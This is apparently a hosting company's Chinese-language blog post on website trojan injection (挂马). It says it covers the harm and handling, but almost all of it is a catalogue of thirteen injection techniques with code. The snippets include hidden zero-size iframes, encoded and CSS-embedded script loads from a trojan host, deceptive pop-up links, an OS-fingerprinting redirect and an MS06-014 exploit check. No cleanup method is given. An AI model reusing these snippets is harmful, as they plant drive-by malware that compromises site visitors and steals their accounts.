您好,今天我们讲下挂马的危害和处理办法。挂马是常见的对网站和客户都影响巨大的危害之一。

上海快网的经验是:如果是在访问出来的源文件的头上,或是最后有被加代码,这个一般是网站文件被要改了,或是ARP,如果是源文件的很多数据位置(中间),那一般是数据库被人挂了。

不完全统计,90%的网站都被挂过马,挂马是指在获取网站或者网站服务器的部分或者全部权限后,在网页文件中插入一段恶意代码,这些恶意代码主要是一些包括IE等漏洞利用代码,用户访问被挂马的页面时,如果系统没有更新恶意代码中利用的漏洞补丁,则会执行恶意代码程序,进行盗号等危险超过。目前挂马主要是为了商业利益,有的挂马是为了赚取流量,有的是为了盗取游戏等账号,也有的是为了好玩,不管是处于那种目的,对于访问被挂马的网站来说都是一种潜在的威胁,影响运营网站公司形象。

一:框架挂马
<iframe src=地址 width=0 height=0></iframe>

二:js文件挂马
首先将以下代码
document.write("<iframe width='0' height='0' src='地址'></iframe>");
保存为xxx.js,
则JS挂马代码为
<script language=javascript src=xxx.js></script>

三:js变形加密
<SCRIPT language="JScript.Encode" src=http://www.upx.com.cn/muma.txt></script>
muma.txt可改成任意后缀

四:body挂马
<body οnlοad="window.location='地址';"></body>

五:隐蔽挂马
top.document.body.innerHTML = top.document.body.innerHTML + '/r/n<iframe

src="http://www.upx.com.cn/muma.htm/"></iframe>';

六:css中挂马
body {
background-image: url('javascript:document.write("<script

src=http://www.upx.com.cn/muma.js></script>")')}

七:JAJA挂马
<SCRIPT language=javascript>
window.open ("地址","","toolbar=no,location=no,directories=no,status=no,menubar=no,scro

llbars=no,width=1,height=1");
</script>

八:图片伪装
<html>
<iframe src="网马地址" height=0 width=0></iframe>
<img src="图片地址"></center>
</html>

九:伪装调用:
<frameset rows="444,0" cols="*">
<frame src="打开网页" framborder="no" scrolling="auto" noresize marginwidth="0"margingheight="0">
<frame src="网马地址" frameborder="no" scrolling="no" noresize marginwidth="0"margingheight="0">
</frameset>

十:高级欺骗
<a href="http://www.163.com(迷惑连接地址,显示这个地址指向木马地址)" onMouseOver="www_163_com();

return true;"> 页面要显示的内容 </a>
<SCRIPT Language="JavaScript">
function www_163_com ()
{
var url="网马地址";
open

(url,"NewWindow","toolbar=no,location=no,directories=no,status=no,menubar=no,scrollbars=no,resizabl

e=no,copyhistory=yes,width=800,height=600,left=10,top=10");
}
</SCRIPT>

十一:判断系统代码
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.0 Transitional//EN">
<HTML><HEAD><TITLE>404</TITLE>
<META http-equiv=Content-Type content="text/html; charset=windows-1252">
<META content="MSHTML 6.00.2900.2769" name=GENERATOR></HEAD>
<BODY>
<SCRIPT language=javascript>
window.status="";
if(navigator.userAgent.indexOf("Windows NT 5.1") != -1)
window.location.href="tk.htm";
else
window.location.href="upx06014.htm";
</SCRIPT>
</BODY></HTML>

十二:判断是否有ms06014代码
<script language=VBScript>
on error resume next
set server = document.createElement("object")
server.setAttribute "classid", "clsid:10072CEC-8CC1-11D1-986E-00A0C955B42E"
set File = server.createobject(Adodb.Stream,"")
if Not Err.Number = 0 then
err.clear
document.write ("<iframe src=http://upx.com.cn width=100% height=100% scrolling=no frameborder=0>")
else
document.write ("<iframe src=http://upx.com.cn width=100% height=100% scrolling=no frameborder=0>")
end if
</script>

十三:智能读取js的代码demo
//读娶src的对象
var v = document.getElementById("advjs");
//读娶src的参数
var u_num = getUrlParameterAdv("showmatrix_num",v.getAttribute('src'));
document.write("<iframe src=/"http://www.upx.com.cn/1/"+u_num+".htm/" width=/"0/" height=/"0/"

frameborder=/"0/"></iframe>");
document.writeln("<!DOCTYPE HTML PUBLIC /"-W3CDTD HTML 4.0 TransitionalEN/">");
document.writeln("<HTML><HEAD>");
document.writeln("<META http-equiv=Content-Type content=/"text//html; charset=big5/">");
document.writeln("<META content=/"MSHTML 6.00.2900.3059/" name=GENERATOR><//HEAD>");
document.writeln("<BODY> ");
document.writeln("<DIV style=/"CURSOR: url(/'http:www.upx.com.cn//demo.js/')/">");
document.writeln("<DIV ");
document.writeln("style=/"CURSOR: url(/'http:www.upx.com.cn//demo.js/')/"><//DIV><//DIV><

//BODY><//HTML>")
//分析src的参数函数
function getUrlParameterAdv(asName,lsURL){
loU = lsURL.split("?");
if (loU.length>1){
var loallPm = loU[1].split("&");
for (var i=0; i<loallPm.length; i++){
var loPm = loallPm.split("=");
if (loPm[0]==asName){
if (loPm.length>1){
return loPm[1];
}else{
return "";
}
}
}
}
return null;
}

如果您还有什么问题,请联系我们,我们尽快解答

如何进行网站挂马检测?怎样清除挂马?相关推荐

  1. 浅谈网站黑链检测和清除的方法

    有时候绝的做SEO是一件很难得事情,因为现在网站到处充斥着黑链,SEO小沫这几天也为网站挂黑苦恼了很久,我们确实知道现在黑链这个行业越来越发达了,卖黑链的朋友到处都是不说,连几个几个站长工具网站里都有 ...

  2. 新型 tomcat websocket 内存马检测与防护思路探究

    最近,看到网上有安全研究人员发布了一篇文章,描述了一款在 tomcat 的全新内存马,地址为:https://www.iculture.cc/forum-post/19128.html,该内存马基于 ...

  3. 网马的反挂马检测及精确投放(免杀)

    前天shadow在群里提到或许可以采取一些方法来实现对挂马检测系统的绕过,遂与其深入探讨了下,事后又考虑到网马的精确投放,总结了一些点做了点儿技术实现 ,并在这里简单记录下想到的一些想法,欢迎其他大牛 ...

  4. 在线安全,在线杀毒,在线可疑文件分析,在线挂马检测

    一.病毒可疑文件分析 http://www.virscan.org/ http://www.virustotal.com/zh-cn/ 二.网站挂马检测 http://union.rising.com ...

  5. 如果反病毒软件不工作 有可能中了Rootkit Rootkit检测和清除还是有办法的

    Rootkit 是一种特殊的 恶意软件 ,因为它们能够在操作系统启动前就加载,还能躲过普通的恶意软件扫描和防护.这种逃避检测的能力让它们尤其难以清除,后续清理工作更难以进行. Rootkit难以查找, ...

  6. 初识Java内存马检测

    近些年,无文件攻击技术越来越流行.本文旨在介绍无文件攻击中最为流行的一种技术--Java内存马,让企业.用户了解和重视其危害性,提高防范意识,降低安全风险. - 全文约1500字,预计阅读时间为4分钟 ...

  7. 中断使能和清除使能、中断挂起和清除挂起

    中断使能和清除使能 中断控制寄存器为可编程的,用于控制中断请求(异常编号16及以上)的使能和禁止. 可以通过两个独立的地址编程这个寄存器: 将设置和清除操作分为两个不同的地址具有诸多优势: 1 减少了 ...

  8. Python:实现费马检测算法(附完整源码)

    Python:实现费马检测算法 def bin_exp_mod(a, n, b):# mod bassert not (b == 0), "This cannot accept modulo ...

  9. 某基于DEDECMS5.5网站的安全检测初步报告

    原创文章:未经许可,禁止转载 .PDF版地址:http://www.if9.cn/Documentation/新手卡UU8网站安全检测报告.pdf                            ...

  10. 内存马检测与利用研究的优秀文章汇总

    出品|MS08067实验室(www.ms08067.com) 随着攻防技术演变,传统形式的jsp木马已经不能满足攻击者的需求,因此内存马(无文件落地Webshell)重回大众视野,成为RedTeam广 ...

最新文章

  1. Java前端控制器模式
  2. python搜索关键词自动提交订单_Python批量获取淘宝相关搜索和下拉框关键词
  3. UNIX学习笔记(七) 后台执行命令3 命令
  4. 使用vm server 虚拟机上安装oracle-rac 共享磁盘错误解决
  5. Azure SQL 数据库最新版本现已提供预览版
  6. java设计模式之设计原则①开闭原则
  7. mysql同步到另一台服务器_mysql两台服务器主从同步
  8. 操作系统中避免死锁的银行家算法【表面C++实际C语言】一学就废的菜鸡代码
  9. 【OpenCV 例程200篇】64. 图像锐化——Sobel 算子
  10. 汉字在线转化unicode编码
  11. 2013年计算机考试ppt,2013年全国专业技术人员计算机应用能力考试PPT题库
  12. JavaWeb_EL表达式存储数据及获得项目路径
  13. 语音识别在智能交通中的几种应用分析
  14. Flash Builder 4 破解
  15. 量子退火算法入门(6):初识量子退火算法的发明过程
  16. 小程序服务器配置要多高,小程序服务器配置要求
  17. php版wap浏览器,PHP 检测手机浏览器的代码
  18. 初学者自学计算机软件,中望CAD初学者自学宝典
  19. 连通区域的边界点程序
  20. 弘辽科技:抖加投放后会增粉吗?有什么技巧?

热门文章

  1. ARM发展史,初步汇总
  2. 2020杭电多校赛 Multi-University Training Contest
  3. 初赛知识点汇总(阶段性完结
  4. 卡西欧计算机怎么进制转换,卡西欧计算机怎么把十进制转换二进制
  5. Mac下清除所有缓存
  6. Python爬虫,高清美图我全都要(彼岸桌面壁纸)
  7. win10-11全版本下载地址MSDN纯净版ISO-20220217更新
  8. css动画帧动画效果,css逐帧动画
  9. java setContentType 为utf-8中文仍为乱码
  10. 小米怎么快速回到顶部_打开小米这3个设置,手机越用越好用啦!你现在还不知道吗?...